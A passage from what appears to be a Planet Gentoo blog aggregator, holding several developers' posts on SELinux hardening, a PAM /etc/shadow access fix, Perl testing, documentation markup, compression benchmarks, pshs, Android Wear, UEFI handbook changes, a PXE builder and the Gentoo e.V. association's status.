But next to the redeployable components, most business services are provided by a single application. Most companies don’t have the budget and resources to put dedicated engineering teams on each and every application that is deployed in the organization. Even worse, many companies hire external consultants to help with the deployment of the component, and the consultants then hand over the maintenance of that software to internal teams. Some consultants don’t bother much with secure configuration deployment guides, or even feel the need to disable security constraints put forth by the organization (policies and standards) because “it is needed”. A deployment is often seen as successful when the software functionally works, which does not necessarily mean that it is misconfiguration-free.

As a recent example that I came across, consider an application that needs Node.js. A consultancy firm is hired to set up the infrastructure, and given full administrative rights on the operating system to make sure that this particular component is deployed fast (because the company wants to have the infrastructure in production before the end of the week). Security is initially seen as less of a concern, and the consultancy firm informs the customer (without any guarantees though) that it will be set up “according to common best practices”. The company itself has no engineering team for Node.js nor wants to invest in the appropriate resources (such as training) for security engineers to review Node.js configurations. Yet the application that is deployed on the Node.js application server is internet-facing, so has a higher risk associated with it than a purely internal deployment.

So, how do we ensure that these applications cannot be exploited or, if an exploit does happen, that the risks involved are contained? Well, this is where I believe SELinux has great potential. And although I’m talking about SELinux here, the same goes for other, similar technologies like TOMOYO Linux, grsecurity’s RBAC system, RSBAC and more.

SELinux can provide a container, decoupled from the application itself (but of course built for that particular application) which restricts the behavior of that application on the system to those activities that are expected. The application itself is not SELinux-aware (or does not need to be – some applications are, but those that I am focusing on here usually don’t), but the SELinux access controls ensure that exploits on the application cannot reach beyond those activities/capabilities that are granted to it.

Consider the Node.js deployment from before. The Node.js application server might need to connect to a MongoDB cluster, so we can configure SELinux to allow just that, while all other connections that originate from the Node.js deployment are forbidden. Worms (if any) cannot then use this deployment to spread out. The same goes for access to files – the Node.js application probably only needs access to the application files and not to other system files. Instead of trying to run the application in a chroot (which requires engineering effort from the people implementing Node.js, which could be a consultancy firm that does not know how, or does not want, to deploy within a chroot), SELinux is configured to disallow any file access beyond the application files.

With SELinux, the application can be deployed relatively safely while ensuring that exploits (or abuse of misconfigurations) cannot spread. All that the company itself has to do is provide resources for an SELinux engineering team (which can be just a responsibility of the Linux engineering teams, but can be specialized as well). Such a team does not need to be big, as policy development effort is usually only needed during changes (for instance when the application is updated to also send e-mails, in which case the SELinux policy can be adjusted to allow that as well), and given enough experience, the SELinux engineering team can build flexible policies that the administration teams (those that do the maintenance of the servers) can tune as needed (for instance through SELinux booleans) without needing the SELinux team to work on the policies again.
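
As a small, hypothetical illustration of that boolean-based tuning (the boolean name below is made up for the example; the real names depend on the policy the SELinux team ships):

# list the booleans the policy exposes for the application domain
getsebool -a | grep nodejs
# persistently allow the extra behaviour, e.g. sending e-mail
setsebool -P nodejs_can_sendmail on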

Using SELinux also has a number of additional advantages which other, sometimes commercial tools (like Symantec's SPE/SCSP – really, Symantec, you ask customers to disable SELinux?) severely lack.

  • SELinux is part of a default Linux installation in many cases. Red Hat Enterprise Linux ships with SELinux by default, and actively supports SELinux when customers have any problems with it. This also improves the likelihood of SELinux being accepted, as other, third-party solutions might not be supported. Ever tried getting support for a system on which both McAfee AV for Linux and Symantec SCSP are running (if you got them to work together at all)? At least McAfee gives pointers on how to update SELinux settings when they would interfere with McAfee processes.
  • SELinux is widely known and many resources exist for users, administrators and engineers to learn more about it. The resources are freely available and often kept up to date by a very motivated community. Unlike commercial products (whose support pages are hidden behind paywalls, whose customers are usually prevented from interacting with each other, and for which tips and tricks are often not found on the Internet), SELinux information can be found almost everywhere. And if you like books, I have a couple for you to read: SELinux System Administration and SELinux Cookbook, written by yours truly.
  • Using SELinux is widely supported by third party configuration management tools, especially in the free software world. Puppet, Chef, Ansible, SaltStack and others all support SELinux and/or have modules that integrate SELinux support in the management system.
  • Using SELinux incurs no additional licensing costs.

Now, SELinux is definitely not a holy grail. It has its limitations, so security should still be seen as a global approach in which SELinux just plays one specific role. For instance, SELinux does not prevent application behavior that is allowed by the policy. If a user abuses a configuration and can have an application expose information that the user usually does not have access to, but the application itself does (for instance because other users of that application might), SELinux cannot do anything about it (well, not as long as the application is not made SELinux-aware). Also, vulnerabilities that exploit application internals are not controlled by SELinux access controls. It is the application behavior (“external view”) that SELinux controls. To mitigate in-application vulnerabilities, other approaches need to be considered (such as memory protections for free software solutions, which can protect against some kinds of exploits – see grsecurity for one of the solutions that could be used).

Still, I believe that SELinux can definitely provide additional protections for such “one-time deployments” where a company cannot invest in resources to provide engineering services on those deployments. The SELinux security controls do not require engineering on the application side, making investments in SELinux engineering very much reusable.

Gentoo Wiki is growing (January 03, 2015, 08:09 UTC)

Perhaps it is because of the winter holidays, but the last weeks I’ve noticed a lot of updates and edits on the Gentoo wiki.

The move to the Tyrian layout, whose purpose is to eventually become the unified layout for all Gentoo resources, happened first. Then, three common templates (Code, File and Kernel) were deprecated in favor of their “*Box” counterparts (CodeBox, FileBox and KernelBox). These provide better parameter support (which should make future updates to the templates easier to implement) as well as syntax highlighting.

But the wiki also saw a number of contributions being added. I added a short article on Efibootmgr as the Gentoo handbook now also uses it for its EFI related instructions, but other users added quite a few additional articles as well. As they come along, articles are being marked by editors for translation. For me, that’s a trigger.

Whenever a wiki article is marked for translations, it shows up on the PageTranslation list. When I have time, I pick one of these articles and try to update it to move to a common style (the Guidelines page is the “official” one, and I have a Styleguide in which I elaborate a bit more on the use). Having a common style gives a better look and feel to the articles (as they are then more alike), gives a common documentation development approach (so everyone can join in and update documentation in a similar layout/structure) and – most importantly – reduces the number of edits that do little more than switch from one formatting to another.

When an article has been edited, I mark it for translation, and then the real workhorses on the wiki start. We have several active translators on the Gentoo wiki, whom we cannot thank enough for their work (I started out at Gentoo as a translator, so I have some feeling for their work). They make the Gentoo documentation reachable for a broader audience. Thanks to the use of the translation extension (kindly offered by the Gentoo wiki admins, who have been working quite hard the last few weeks on improving the wiki infrastructure), translations are easier to handle and follow through on.

The advantage of a translation-marked article is that any change on the article also shows up on the list again, allowing me to look at the change and perform edits when necessary. For the end user, this is behind the scenes – an update on an article shows up immediately, which is fine. But for me (and perhaps other editors as well) this gives a nice overview of changes to articles (watchlists can only go so far) and also shows the changes in a simple yet efficient manner. Thanks to this approach, we can more actively follow up on edits and improve where necessary.

Now, editing is not always just a few minutes of work. Consider the GRUB2 article on the wiki. It was marked for translation, but had some issues with its style. It was very verbose (which is not a bad thing, but suggests splitting the information across multiple articles) and had quite a few open discussions on its Discussions page. I started editing the article around 13.12h local time, and ended at 19.40h. Unlike with offline documentation, the entire editing process can be followed through the page's history. And although I'm still not 100% satisfied with the result, it is imo easier to follow and read.

However, don’t get me wrong – I do not feel that the article was wrong in any way. Although I would appreciate articles that immediately follow a style, I would rather see more contributions (which we can then edit towards the new style) than start penalizing contributors that don’t use the style. That would be counterproductive, because it is far easier to update the style of an article than to write articles. We should try and get more contributors to document aspects of their Gentoo journey.

So, please keep them coming. If you find a lack of (good) information for something, start jotting down what you know in an article. We’ll gladly help you out with editing and improving the article then, but the content is something you are probably best to write down.

January 02, 2015
Andreas K. Hüttel a.k.a. dilfridge (homepage, bugs)

Most of us in the Gentoo Perl packaging team are already running ~arch Perl even on otherwise stable machines, and Perl 5.20 is looking very good so far. Our current plan is to wait for another month or so and then file the stabilization request in February. This would be a real achievement, since at that point we'd actually have the latest and greatest upstream stable Perl release also stable in Gentoo; this hasn't been the case for a very long time.
Of course, we need testers for that; the architecture teams cannot possibly try out all Perl programs in Gentoo with the new version. So, if you're feeling adventurous, and if you are running a fully updated stable system, please help us!
What do you need to do? First, upgrade perl-cleaner to ~arch by placing the following line in your package.keywords (or package.accept_keywords)
app-admin/perl-cleaner
and updating perl-cleaner (to currently 2.19):
emerge -u1a perl-cleaner
Then, upgrade Perl (and only Perl) to ~arch by placing the following exact three lines in your package.keywords (or package.accept_keywords):
dev-lang/perl
virtual/perl-*
perl-core/*
Then, upgrade your system with
emerge -uDNav world
perl-cleaner --all
This should already be much easier than with previous Perl versions. In theory, all Perl packages should be rebuilt by emerge via the subslot rebuild mechanism, and perl-cleaner should not find anything left to do, but we cannot be 100% sure of that yet. (Looking forward to feedback.)
Well, and then use Perl and use your system, and if you encounter any problems, file bugs!!!

A final remark: once Perl 5.20 becomes stable, you may want to remove the above keywording lines from your portage configuration again.

Luca Barbato a.k.a. lu_zero (homepage, bugs)
Document your project! (January 02, 2015, 16:45 UTC)

After discussing how to track your bugs and your contributions, let's see what we have for documentation.

Pain and documentation

A healthy Open Source project mainly needs contributors, and contributors are usually your users. You get users if the project is known and useful (and if you do not have parasitic entities siphoning off your work by abusing git-merge; best of luck to io.js and markdown-it in avoiding that experience, switching names is enough of a pain without it).

In order to gain mindshare, the best thing is to make what you do easier to use, and that requires documenting what you did! The process is usually boring and time-consuming, and every time you change something you have to make sure the documentation still matches reality.

In the open source community we have multiple options for the kind of documentation we produce and how to produce it.

Wiki

When you need to keep some structure but want an easy way to edit it, a wiki can be a good choice and can lead to nice results. The information present is usually correct and, if enough people keep editing, up to date.

Pros:

  • The wiki is quick to edit and you can have people contribute by just using a browser.
  • The documentation is easily indexed by search engines
  • It can be restricted to a number of trusted people
Cons:

  • The information is detached from the actual code and it could desync easily
  • Even if kept up to date, what applies to the current release is not what your poor user might have
  • Usually keeping versioned content is not that simple

Forum

Even if they are usually noisy, forums are quite often a good source of information.
Personally, I try to move interesting bits to a wiki page when I find something that is not completely transient.

Pros:

  • Usually everything requires less developer interaction
  • Users can share solutions to their problems effectively
Cons:

  • The information can get stale even quicker than what you have in the wiki
  • Since it is mainly user-generated, the solutions proposed might be suboptimal
  • Being highly interactive, it requires more dedicated people to take care of unruly users

Manuals

There are lots of good toolchains for writing full manuals, as we have in Gentoo.

The old-style XML/DocBook toolchains tend to have a really steep learning curve, not to mention even more quirky and wonderful monsters such as LaTeX (and the lesser texinfo). ReStructuredText, asciidoc and some flavour of markdown seem to be better tools for the task if you need speed and want to get contributors up to speed.

Pros:

  • A proper manual can be easily pinned to a specific release
  • It can be versioned using git
  • Some people still like something they can print and that has a proper index
Cons:

  • With the old tools it is a pain to get started
  • The learning curve can still be unbearable for most contributors
  • It requires some additional dedication to keep it up to date

What to use and why

Usually for small projects the manual is the README; once the project grows, a wiki is usually the best place to put notes from multiple people. If you are good at it, a manual is a boon for all your users.

Tools for documentation-in-code such as doxygen or docurium can help a lot if your project has a single codebase.
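
Getting started with doxygen, for instance, is just a couple of commands (a minimal sketch; the generated Doxyfile still needs to be tuned to the project):

# generate a template configuration file, then run doxygen over the sources it points at
doxygen -g Doxyfile
doxygen Doxyfile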

If you need to unify a LOT of different information, as we have in Gentoo, the problems usually get much more annoying: you have content written in multiple markups, living in multiple places, and moving it from one place to another usually requires a serious editing effort (like moving from our GuideXML to the current semantic wiki).

Markup suggestion

Markdown/CommonMark/Kramdown

I do like CommonMark a lot, and I even started to port and extend it to be used in docutils, since I find ReStructuredText too confusing for normal users. Its best quality is the natural flow; its most annoying defect is that there are too many parser discrepancies and sometimes implementations disagree. Still, it is better to have many good implementations than one that is subpar at everything (hi texinfo, I hate your toolchain).

Asciidoc

The markup is quite nice (up to a point) and the toolchain is sort of nice, even if it feels like a Rube Goldberg machine. To my knowledge there is a single implementation of it, and that makes me MUCH more wary of using it in new projects.

ReStructuredText

The markup is not as intuitive as Asciidoc, thus quite far from Markdown's immediate-use feeling, but it has a great toolchain (if you like Python) and it can be extended to produce lots of different well-formatted documents.
It comes with loads of markup features that core Markdown lacks: an include directive, table of contents, pluggable generic block and span directives, and three different flavours of tables.

All in all, good if you can come to terms with its complexity.

What’s next

Hopefully during this year among my many smaller and bigger projects, I’ll find time to put together something nice for documentation as well.

January 01, 2015
Patrick Lauer a.k.a. bonsaikitten (homepage, bugs)
Compression comparison (January 01, 2015, 10:59 UTC)

Random question of the day: How do different compression methods compare?
This fancy miserable graph is the result of a few minutes of scripting around. Red is time, Yellow is size.

Input file was stage3-amd64-20141204.tar.bz2, uncompressed 720MB (tar).
For every compression algorithm I went through compression levels -1 .. -9 and recorded both the resulting size and the time needed. Amusingly, time in seconds and size in MB are of a similar magnitude, so the graph fits quite nicely.
(Bonus exercise: How much time does unpacking need?)
Edit: Just tested that. So - lz4 takes between 1 and 0.85 seconds to unpack to /dev/zero. Higher compression levels *go faster* - counterintuitive, but fun.
gzip shows the same behaviour with 5.7 .. 5.1 seconds.
bzip2 goes from 27 to 35 seconds, where higher compression levels take longer to unpack.
And xz takes 80 .. 57 seconds, going 'backwards' like lz4.
-End edit -
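
For reference, the compression measurement described above can be sketched roughly like this (a minimal sketch, not the actual script used; gzip is shown, and the same loop applies to lz4, bzip2 and xz):

# record wall-clock time and output size for each compression level
for level in $(seq 1 9); do
    /usr/bin/time -f "%e" -o time.txt gzip -${level} -c stage3-amd64-20141204.tar > out.gz
    echo "gzip -${level}: $(cat time.txt) s, $(du -m out.gz | cut -f1) MB"
done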

By far the fastest is lz4, doing over 200MB/s effective. The slowest is xz at around 2MB/s.
But lz4 also only shrinks it to about 50% of the input size, while xz gets it down to 18%. So there's some interesting tradeoffs to be found.

gzip -9 and bzip2 -1 are roughly comparable for this dataset.
But gzip gets silly slow, so gzip -6 seems to be the best time/space tradeoff.
lz4 also doesn't improve a lot at higher levels, just spends more time.

The clear winner for size is xz, but the compression time is very noticeably higher than the competition. Still, xz -1 is comparable to bzip2 -9 - that's quite amusing.

So, if you're CPU-limited lz4 is best, if you are bandwidth-limited xz is best, and in between there's a wide fuzzy area of tradeoffs.

Oh well, here's the raw data:

method	level	time (s)	size (MB)
lz4	1	3.4	326
	2	3.5	326
	3	3.5	326
	4	13.5	266
	5	16.3	263
	6	19.6	261
	7	22.8	260
	8	26.8	260
	9	30.6	260
			
gzip	1	15.4	260
	2	16.2	254
	3	20.1	248
	4	21	240
	5	27.8	234
	6	40.7	231
	7	50.3	230
	8	83.3	230
	9	126.6	229
			
bzip2	1	78	218
	2	77	211
	3	77	207
	4	79	204
	5	81	203
	6	80	201
	7	85	200
	8	87	199
	9	91	198
			
xz	1	77	184
	2	103	175
	3	144	167
	4	210	160
	5	276	150
	6	320	149
	7	328	136
	8	340	133
	9	354	132

December 30, 2014
Sven Vermeulen a.k.a. swift (homepage, bugs)
Why does it access /etc/shadow? (December 30, 2014, 20:48 UTC)

While updating the SELinux policy for the Courier IMAP daemon, I noticed that it (well, the authdaemon that is part of Courier) wanted to access /etc/shadow, which is of course a big no-no. It doesn’t take long to know that this is through the PAM support (more specifically, pam_unix.so). But why? After all, pam_unix.so should try to execute unix_chkpwd to verify a password and not read in the shadow file directly (which would require all PAM-aware applications to be granted access to the shadow file).

So I dived into the Linux-PAM sources (yay free software).

In pam_unix_passwd.c, the _unix_run_verify_binary() method is called but only if the get_account_info() method returns PAM_UNIX_RUN_HELPER.

static int _unix_verify_shadow(pam_handle_t *pamh, const char *user, unsigned int ctrl)
{
...
        retval = get_account_info(pamh, user, &pwent, &spent);
...
        if (retval == PAM_UNIX_RUN_HELPER) {
                retval = _unix_run_verify_binary(pamh, ctrl, user, &daysleft);
                if (retval == PAM_AUTH_ERR || retval == PAM_USER_UNKNOWN)
                        return retval;
        }

In passverify.c this method will check the password entry file and, if the entry is a shadow file, will return PAM_UNIX_RUN_HELPER if the current user id is not root, or if SELinux is enabled:

PAMH_ARG_DECL(int get_account_info,
        const char *name, struct passwd **pwd, struct spwd **spwdent)
{
        /* UNIX passwords area */
        *pwd = pam_modutil_getpwnam(pamh, name);        /* Get password file entry... */
        *spwdent = NULL;
 
        if (*pwd != NULL) {
...
                } else if (is_pwd_shadowed(*pwd)) {
                        /*
                         * ...and shadow password file entry for this user,
                         * if shadowing is enabled
                         */
#ifndef HELPER_COMPILE
                        if (geteuid() || SELINUX_ENABLED)
                                return PAM_UNIX_RUN_HELPER;
#endif

SELINUX_ENABLED is a C macro defined in the same file:

#ifdef WITH_SELINUX
#include <selinux/selinux.h>
#define SELINUX_ENABLED is_selinux_enabled()>0
#else
#define SELINUX_ENABLED 0
#endif

And this is where my “aha” moment came forth: the Courier authdaemon runs as root, so its user id is 0. The geteuid() method will return 0, so the SELINUX_ENABLED macro must return non-zero for the proper path to be followed. A quick check in the audit logs, after disabling dontaudit lines, showed that the Courier IMAPd daemon wants to get the attribute(s) of the security_t file system (on which the SELinux information is exposed). As this was denied, the call to is_selinux_enabled() returns -1 (error) which, through the macro, becomes 0.
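
For those who want to reproduce that kind of check, a short sketch (the grep pattern is just an example):

# temporarily rebuild the policy without dontaudit rules, then look for the denial
semodule -DB
ausearch -m avc -ts recent | grep courier
# re-enable the dontaudit rules afterwards
semodule -B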

So granting selinux_getattr_fs(courier_authdaemon_t) was enough to get it to use the unix_chkpwd binary again.

To fix this properly, we need to grant this to all PAM-using applications. There is an interface called auth_use_pam() in the policies, but that isn’t used by the Courier policy. Until now, that is ;-)

December 26, 2014
Michał Górny a.k.a. mgorny (homepage, bugs)
pshs — the awesome file sharing tool (December 26, 2014, 16:00 UTC)

For a long time I lacked a proper tool to quickly share a few files for a short time. The tools I was able to find either required some setup, installing client counterparts or sending my files to a third-party host. So I felt the need to write something new.

The HTTP protocol seemed an obvious choice. Relatively simple, efficient, with some client software installed almost everywhere. So I took HTTP::Server::Simple (I think) and wrote the first version of publish.pl script. I added a few features to that script but it never felt good enough…

So back in 2011 I decided to reboot the project. This time I decided to use C and libevent, and that’s how pshs came into being. With some development occurring over the last three years, lately I have started adding new features aiming to turn it into something really awesome.

So what is pshs? It’s a simple, zero-configuration command-line HTTP server to share files. You pass it a list of files and it lets you share them.
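
A minimal invocation could look like this (the file names are just an example):

$ pshs holiday-photos.tar.gz notes.txt

pshs then prints the address under which the files can be fetched (see the screenshot below).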


Screenshot of pshs

But what really makes pshs special are the features:

  1. it shares only the files specified on the command-line — no need for extra configuration, moving files to separate directories etc. It simply returns 404 for any path not specified on the command-line, whether it exists or not.
  2. Full, working Range support. You can resume interrupted downloads and seek freely. Confirmed that playing a movie remotely works just fine.
  3. Unless told otherwise, it chooses a random port to use. You don’t have to decide on one, you can use pshs alongside regular HTTP servers and other services, and you can freely run multiple instances of pshs if you need to. TODO: perform a port search until a free port is found on the interface that has the external IP.
  4. Netlink and UPnP support provide the best means to obtain the external IP. If you have one on local interface, pshs will find and print it. If you don’t, it will try to enable port forwarding using UPnP and obtain the external IP from a UPnP-compliant router.
  5. QRCode printing (idea copied from systemd). Want to text a link to your files? Just scan the code!
  6. MIME-type guessing. Well, it’s not that special but it makes sure your images show up as images in a web browser rather than as opaque files that can only be saved.
  7. Zero-configuration SSL/TLS support — the keys and a self-signed certificate with correct public IP are generated at startup. While this is far from perfect (think of all the browsers complaining about self-signed certificates), it at least gives you the possibility of using encryption. It also prints the certificate fingerprint if you’d like to verify the authenticity.

I have also a few nice ideas in TODO, yet unsure which of them will be actually implemented:

  1. HTTP digest authentication support — in case you wanted some real security on the files you share.
  2. Download progress reporting — to let you know whether and for how long you need to keep the server up. Sadly, this does not look easy given the current libevent design.
  3. ncurses UI — to provide visual means for progress reporting :). Additional possibilities include keeping server URL on screen, a status line, and possibly scrolling logs.
  4. GTK+ UI with a tray icon and notification daemon support — to provide better desktop integration for sharing files from your favorite file manager.
  5. Recursive directory sharing — currently you have to list all files explicitly. This may include better directory indexes since currently pshs creates only one index of all files.

Which of those features would you find useful? What other features would you like to see in pshs?

December 25, 2014
Gnome 3.14 (December 25, 2014, 23:46 UTC)

Gnome 3.14 ebuilds started hitting the tree a couple of days ago. Move is now complete and Gnome 3.14 was unmasked a couple of minutes ago. Besides the usual bumps, we worked on adding complete Wayland support. If you are eager to help upstream debug it, feel free to test but before filing any report, don’t forget to check upstream’s list of known limitations (like missing Drag’n’Drop, etc).
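
If you want to give it a try now that it is unmasked, something along these lines should pull it in (just a sketch; adjust to your own sets and USE flags):

# update to the freshly unmasked GNOME 3.14
emerge --ask --update --deep --newuse gnome-base/gnome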

Gnome 3.14 also required GStreamer 1.4, which leio has been working on. The first ebuilds have been added to allow the Gnome unmasking; more to come.

We are also still looking for new recruits for the team as we are really low on active team members. If you feel like helping but are not sure about your skills, worry not, we can help you.

Diego E. Pettenò a.k.a. flameeyes (homepage, bugs)
Impressions of Android Wear in everyday life (December 25, 2014, 13:57 UTC)

All readers of this blog know I'm a gadgeteer, by now. I have been buying technogizmos at first chance if I had the money for it, and I was thus an early adopter of ebooks back in the days. I have, though, ignored wearables for various reasons.

Well, it's not strictly true — I did try Google Glass in the past year. Twice, to be precise. Once the "standard" version, and once a version with prescription lenses – not my lenses though, so take it with a grain of salt – and neither time did it excite me. In particular, the former wouldn't be an option due to my need for prescription glasses, and the latter is a terrible option because I have the impression that the display obstructs too much of the field of vision in that configuration.

Yes, I know I could wear contact lenses, but I'm scared of them so I'm not keeping them in mind. I'm also saving myself the pain in the eye for when smart contact lenses will tell me my blood glucose levels without having to prick myself every day.

Then smartwatches became all the rage and a friend of mine actually asked me whether I was going to buy one, since I seemed to be fond of accessories… well, the truth is that I'm not really that fond of them. It just gives the impression because I always have a bag on me and I like hats (yup even fedoras, not trilbies, feel free to assassinate my character for that if you want.)

By the way, the story of how I started using satchels is fun: when I first visited London, I went with some friends of mine, and one of the things we intended to do was go to the so-called Gathering Hall that Capcom set up for players of Monster Hunter Freedom Unite. My options for carrying the PSP around were pants pockets or a cumbersome backpack — one of my friends had just bought a new bag at a Camden Town stall which instead fit the PSP perfectly, and he had space to make the odd purchase and not worry about where to stash it. I ended up buying the same model in a different colour.

Then Christmas came and I got a G Watch as a gift. I originally wanted to just redirect it to my sister — but since she's an iPhone user that was not an option, and I ended up trying it out myself. I have to say that it's an interesting gadget, which I wouldn't have bought by myself but I'm actually enjoying.

The first thing you notice when starting to use it is that its main benefit is stopping you from turning on your phone's display — because you almost always do that for two reasons: to check the time and to check your notifications, both things you can now do by flicking your wrist. I wonder if this can count as security, as I've been "asked the time" plenty of times around Dublin by now and I would like to avoid a repeat.

Of course during the day most of the phone's notifications are work-related: email asking me to do something, reminders about meetings, alerts when I'm oncall, … and in that the watch is pretty useful, as you can silence the phone and rather have the watch "buzz" you by vibrating — a perfect option for the office where you don't want to disturb everybody around you, as well as the street where the noise would make it difficult to hear the notification sounds — even more when you stashed the phone in your bag as I usually do.

But the part whose usefulness surprised me the most is using it at home — even though things got a bit trickier there, as I can't get full coverage of the (small) apartment I rent. On the other hand, if I leave the phone on the coffee table from which I'm typing right now, I can get full coverage in the kitchen, which is what makes it so useful at home for me: I can set a timer when cooking, and I have not burnt anything since I got the watch — yes, I'm terrible that way.

Before, I would have to either use Google Search to set the alarm on one of the computers, or use the phone to set it — the former tends to be easily forgotten and is annoying to stop when focusing on a different tab/window/computer, the latter requires me to unlock the phone to set up the timer, and while Google Now on any screen should be working, it does not seem to stick for me. The watch can be enabled by a simple flick of the wrist, responds to voice commands mostly correctly (I still make the mistake of saying «set timer to 3 minutes», which gets interpreted as «set timer 23 minutes»), and is easy to stop (just palm it off).

I also started using my phone to play Google Play Music on the Chromecast so I can control the playback from the phone itself — which is handy when I get a call or a delivery at the door, or whatever else. It does feel like living in the future if I can control whatever is playing over my audio system from a different room.

One thing that I needed to do, though, was replace the original plastic strap. The reason is very much personal, but I think it might be a useful suggestion to others to know that it is a very simple procedure — in my case I just walked into a jeweller's and asked for a leather strap; half an hour later they had my watch almost ready to go, they just needed to take my measurements to punch the right holes in it. Unlike the G Watch R – which honestly looks much better both in pictures and in real life, in my opinion much better than the Moto 360 too, as the latter appears too round to me – the original G Watch has a standard 22mm strap connector, which makes it trivial to replace for a watch repair shop.

With the new strap, the watch is almost weightless to me, partly because the leather is lighter than the plastic, partly because it does not stick to my hair and pull me every which way. Originally I wanted a metal strap, honestly, because that's the kind of watch I used to wear — but the metal interferes with Bluetooth reception, which is already poor as it is on my phone. It also proves a challenge for charging, as most metal straps are closed loops and the cradle needs to fit in the middle of them.

Speaking of reception, I had been cursing hard about the bad reception even in my apartment — this somehow stopped the other day, and only two things happened when it improved: I changed the strap and I kicked out the Pear app — mostly because it was driving me crazy as it kept buzzing me that the phone was away and back while it was just sitting in my pocket. Since I don't think, although I can't exclude it, that the original strap was the cause of the bad reception, I decided to blame the Pear app and not have it on my phone any more. With better connectivity came better battery life, and the watch was able to reach one and a half full days, which is pretty good for it.

I'm not sure if wearables are a good choice for the future — plenty of things in the past looked like they were here to stay and weren't. This is by far not the first attempt at making a smart watch, of course; I remember those that would sync with a PC using video interference. We'll see what it comes down to. For the moment I'm happy with the gift I received — but I'm not sure I would buy it myself if I had to.

December 23, 2014
Sven Vermeulen a.k.a. swift (homepage, bugs)
Added UEFI instructions to AMD64/x86 handbooks (December 23, 2014, 16:08 UTC)

I just finished up adding some UEFI instructions to the Gentoo handbooks for AMD64 and x86 (I don’t know how many systems are still using x86 instead of the AMD64 one, and if those support UEFI, but the instructions are shared and they don’t collide). The entire EFI stuff can probably be improved a lot, but basically the things that were added are:

  1. boot the system using UEFI already if possible (which is needed for efibootmgr to access the EFI variables). This is not entirely mandatory (as efibootmgr is not mandatory to boot a system) but recommended.
  2. use vfat for the /boot/ location, as this now becomes the EFI System Partition.
  3. configure the Linux kernel to support EFI stub and EFI variables
  4. install the Linux kernel as the bootx64.efi file to boot the system with
  5. use efibootmgr to add boot options (if required) and create an EFI boot entry called “Gentoo”
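
As an illustration of that last step, creating such an entry could look roughly like this (a sketch only; the disk, partition number and loader path are assumptions that depend on your layout, and the handbook has the exact instructions):

# register an EFI boot entry named "Gentoo" pointing at the kernel installed as bootx64.efi
efibootmgr --create --disk /dev/sda --part 2 --label "Gentoo" --loader "\efi\boot\bootx64.efi"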

If you find grave errors, please do mention them (either on a talk page on the wiki, as a bug, or through IRC) so they get picked up. All developers and trusted contributors on the wiki have access to the files so they can edit where needed (but do take care, if something is edited, that it is either architecture-specific or shared across all architectures – check the page when editing: if it is Handbook:Parts then it is shared, and Handbook:AMD64 is specific to that architecture). And if I’m online I’ll of course act on it quickly.

Oh, and no – it is not a bug that there is a (now unused) /dev/sda1 “bios” partition. Given the differences between the possible installation alternatives, it is easier for us (me) to just document a common partition layout than to try and write everything out (which would just make it harder for new users to follow the instructions).

December 20, 2014
Alexys Jacob a.k.a. ultrabug (homepage, bugs)
Gentoo Linux PXE builder (December 20, 2014, 18:06 UTC)

Due to a bad hardware failure a few weeks ago at work, I had to rebuild a good part of our PXE stack and I ended up once again looking for the steps to build a PXE-ready Gentoo initramfs.

Then I realized that, while I was at it, I wanted this PXE initramfs to feature more than a live-CD-like boot, because I use PXE to actually install my servers automatically using ansible. So why not embed all my needs straight into the PXE initramfs and automate the whole boring process of creating it?

That’s what the gentoo-pxe-builder project is about, and I thought I’d open source it in case it could help and save some time for anyone else.

The main idea is to provide a simple bash script which bases itself on the latest Gentoo live CD kernel/initramfs to prepare a PXE-suitable version which you can easily hack on without having to handle all the squashfs/cpio hassle of rebuilding it.

Quick steps it does for you:

  • download the latest live CD
  • extract the kernel / initramfs from it
  • patch the embedded squashfs to make it PXE ready (see the sketch after this list)
  • setup SSH and a default root password so you can connect to your PXE booted machine directly
  • add a hackable local.d start script which will be executed at the end of the PXE boot
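
The squashfs patching mentioned in the list essentially boils down to something like this (a rough sketch of the idea, not the exact commands the script runs; file names are illustrative):

# unpack the live CD squashfs, tweak it, and repack it for PXE use
unsquashfs -d squashfs-root image.squashfs
# ... enable sshd, set the root password, drop in the local.d start script ...
mksquashfs squashfs-root image-pxe.squashfs -comp xz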

The provided local.d start script displays the IP address, so you can actually see the IP address being set up on your PXE host, and it will also display the real names of the network interfaces detected on the host, based on udev deterministic naming.

You can read everything in more details on the project’s README.

Of course it’s mainly oriented towards my use case, and I’m sure the process / patching could be even more elegant, so feel free to contribute or ask for/propose features; I’ll happily follow up on them!

Sebastian Pipping a.k.a. sping (homepage, bugs)

Foreword and review

The Förderverein Gentoo e.V. has existed since 2003. At the end of 2009 it was almost dissolved. Back then the dissolution was averted by finding two new board chairs — Robert Buchholz and Sebastian Pipping, both members since October 2009.

A few things have gained momentum in the association since then (under various boards):

  • New T-shirts
  • Gentoo mugs for the first time
  • Gentoo posters for the first time
  • Gentoo lanyards for the first time
  • Booth banners for trade fairs
  • Internal switch from CVS to Git
  • Switch from a paid server at Hetzner to sponsored servers from Manitu and SysEleven (big thanks!)

Other things went less well:

  • A regular general meeting was missed (and the board was later discharged for it)
  • The idea of holding general meetings in chat failed (over formalities and authentication)
  • Minutes of general meetings mostly arrived much later than necessary
  • The relocation of the association's registered seat from Oberhausen to Berlin is formally still not finalized
  • In 2014 several services were down for weeks
  • Only since 2014 have the servers been kept up to date in a timely manner
  • We did too little to chase members about paying their membership fees.

Since effectively only the board is active in the association, and all board members are by now employed full-time, leaving less time for the Gentoo e.V. than would be good, the question once again arises …

how long the Gentoo e.V. can continue to exist if no new active members are found to effectively take over from the board by December 2015.

What does the association do so far?

Services to the outside

  • Presence at trade fairs and conferences (e.g. LinuxTag Berlin or 31c3)
  • Creation and procurement of merchandise (alphabetically)
    • Buttons (with magnet or pin)
    • Posters
    • Stickers
    • Mugs
    • T-shirts
  • Operation of the rsync mirror rsync1.de.gentoo.org (served entirely from a RAM disk)
  • Operation of the user map
  • Holding domains such as gentoo.de, portage.de and others
  • Management of the “Gentoo” trademark
    • Issuing of licenses
  • Operation of the discussion, announce and members mailing lists
  • Reports to the outside world (e.g. about events)

Services to the inside

  • Keeping servers/software (secure, functional and) up to date
    • Updating the base system every few days, currently two machines
    • Updating or porting Redmine (+ theme), MediaWiki (+ theme) and Mailman
  • Member coordination
    • Writing invitations to general meetings (LaTeX)
    • Finding a date and a room for the general meeting
    • Typesetting the minutes in TeX and uploading them
    • Sending paper letters to members whose e-mail addresses are unreachable
    • Propagating joins and departures to the member database and the Mailman lists
    • Reminding members about membership fee payments
  • Finances
    • Reimbursing expenses by bank transfer
    • Organizing invoices
    • Writing the annual financial report

Future

We need you to:

  • Take over parts of the ongoing tasks
  • Help with legal matters:
    • The current board has so far been rather out of its depth with legal concerns.
    • Gentoo users who are lawyers, please get in touch!
